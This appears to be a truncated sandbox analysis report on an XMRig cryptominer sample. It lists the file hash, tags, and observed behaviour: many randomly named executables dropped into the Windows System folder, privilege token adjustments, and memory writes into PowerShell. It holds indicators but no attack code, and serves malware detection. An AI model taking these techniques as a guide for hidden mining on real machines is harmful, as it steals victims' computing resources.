Malware Analysis Report

2025-04-19 15:29

Sample ID 240522-ztzrqagd9v
Target 3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe
SHA256 d712366f7a06de3361ddbf4376094692bbacef687231b55bc53473c8bb510940
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d712366f7a06de3361ddbf4376094692bbacef687231b55bc53473c8bb510940

Threat Level: Known bad

The file 3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

XMRig Miner payload

Xmrig family

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 21:01

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 21:01

Reported

2024-05-22 21:03

Platform

win7-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\tyAOfJU.exe N/A
N/A N/A C:\Windows\System\kcNmKkM.exe N/A
N/A N/A C:\Windows\System\NCbSbWH.exe N/A
N/A N/A C:\Windows\System\mdDwtNI.exe N/A
N/A N/A C:\Windows\System\VDsHovw.exe N/A
N/A N/A C:\Windows\System\BaLrkTI.exe N/A
N/A N/A C:\Windows\System\gXrcmas.exe N/A
N/A N/A C:\Windows\System\FJDJVkc.exe N/A
N/A N/A C:\Windows\System\wbrEZEN.exe N/A
N/A N/A C:\Windows\System\QNkapwI.exe N/A
N/A N/A C:\Windows\System\lKcbNQa.exe N/A
N/A N/A C:\Windows\System\jMzNhmV.exe N/A
N/A N/A C:\Windows\System\tJgrxBW.exe N/A
N/A N/A C:\Windows\System\MRZBMyW.exe N/A
N/A N/A C:\Windows\System\ddPkPXd.exe N/A
N/A N/A C:\Windows\System\AWKPgNc.exe N/A
N/A N/A C:\Windows\System\BonoMfd.exe N/A
N/A N/A C:\Windows\System\nkRAjCm.exe N/A
N/A N/A C:\Windows\System\JdFxsvL.exe N/A
N/A N/A C:\Windows\System\LjQLVpW.exe N/A
N/A N/A C:\Windows\System\MXTqVsc.exe N/A
N/A N/A C:\Windows\System\tAXNxnT.exe N/A
N/A N/A C:\Windows\System\wnRKIeL.exe N/A
N/A N/A C:\Windows\System\JSRSNml.exe N/A
N/A N/A C:\Windows\System\hhpqwIl.exe N/A
N/A N/A C:\Windows\System\JlzFnHt.exe N/A
N/A N/A C:\Windows\System\iFNWlxa.exe N/A
N/A N/A C:\Windows\System\TKJWcoW.exe N/A
N/A N/A C:\Windows\System\drFOHVR.exe N/A
N/A N/A C:\Windows\System\JwiGzrk.exe N/A
N/A N/A C:\Windows\System\thlLNOg.exe N/A
N/A N/A C:\Windows\System\nLPvUlu.exe N/A
N/A N/A C:\Windows\System\iFEpCwn.exe N/A
N/A N/A C:\Windows\System\plHvLvc.exe N/A
N/A N/A C:\Windows\System\VbfeQnY.exe N/A
N/A N/A C:\Windows\System\bTCLVed.exe N/A
N/A N/A C:\Windows\System\zPapknG.exe N/A
N/A N/A C:\Windows\System\PqIkVEO.exe N/A
N/A N/A C:\Windows\System\qlyRWQx.exe N/A
N/A N/A C:\Windows\System\OixsoQP.exe N/A
N/A N/A C:\Windows\System\Ctkzsqx.exe N/A
N/A N/A C:\Windows\System\isbRxtN.exe N/A
N/A N/A C:\Windows\System\WwMUtII.exe N/A
N/A N/A C:\Windows\System\OkjMtAr.exe N/A
N/A N/A C:\Windows\System\rSvNZgZ.exe N/A
N/A N/A C:\Windows\System\gwgVavP.exe N/A
N/A N/A C:\Windows\System\iHelium.exe N/A
N/A N/A C:\Windows\System\ewaUDtm.exe N/A
N/A N/A C:\Windows\System\gUoCAPe.exe N/A
N/A N/A C:\Windows\System\mtEsqxp.exe N/A
N/A N/A C:\Windows\System\ObEoxgx.exe N/A
N/A N/A C:\Windows\System\iLaOXBB.exe N/A
N/A N/A C:\Windows\System\MDBuise.exe N/A
N/A N/A C:\Windows\System\ABVNGeT.exe N/A
N/A N/A C:\Windows\System\HbDrSUS.exe N/A
N/A N/A C:\Windows\System\gDafpof.exe N/A
N/A N/A C:\Windows\System\SqsfTYG.exe N/A
N/A N/A C:\Windows\System\FtkmACP.exe N/A
N/A N/A C:\Windows\System\cPmSduv.exe N/A
N/A N/A C:\Windows\System\eSoUIPc.exe N/A
N/A N/A C:\Windows\System\IQtPRSW.exe N/A
N/A N/A C:\Windows\System\WIljUlj.exe N/A
N/A N/A C:\Windows\System\yfRaCyE.exe N/A
N/A N/A C:\Windows\System\vmkWkUp.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\tandBnQ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rlzBfwE.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vDcqPxM.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RWFxsee.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cMyrUQg.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MXTqVsc.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UyRJNVU.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XPWLYdk.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QWwBruH.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sfGckTI.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yLjfzED.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DGYHbhX.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TUDFQQP.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TURppmh.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PvOGFlr.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QaTlYYv.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MJuwCdJ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BiWuTYk.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZmhxDoO.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lTIfqRV.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nGxCnIa.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PljVPTE.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bIYdByw.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gTvfDtm.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RgZGNJu.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vmtSfaJ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mNuzfcW.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ykpmwEO.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hFvRDUd.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BtvjaWo.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WnZbOnw.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wsbYsbr.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FlKuUPJ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\imPGeHj.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XHywqla.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\plHvLvc.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CcGlmlo.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oytDAuC.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ooKmRjJ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ftXrftg.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KRYUaSY.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gFWWDPF.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\knJaFmM.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nKPKhXq.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hTLbpGQ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vaTslGp.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bdmpFrm.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QzAukYR.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ErmHySJ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IGUXorC.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\onqysEL.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aJUpLoI.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cNxQcZp.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NzgULMb.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZZqdynX.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kOOnSpC.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zZXIkUZ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qqbJfrI.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xoCFTeR.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uIrmpXt.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nrZfiTg.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cQILocp.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ckOuFzm.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FAohSWp.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2968 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2968 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\tyAOfJU.exe
PID 2968 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\tyAOfJU.exe
PID 2968 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\tyAOfJU.exe
PID 2968 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\kcNmKkM.exe
PID 2968 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\kcNmKkM.exe
PID 2968 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\kcNmKkM.exe
PID 2968 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe C:\Windows\System\NCbSbWH.exe
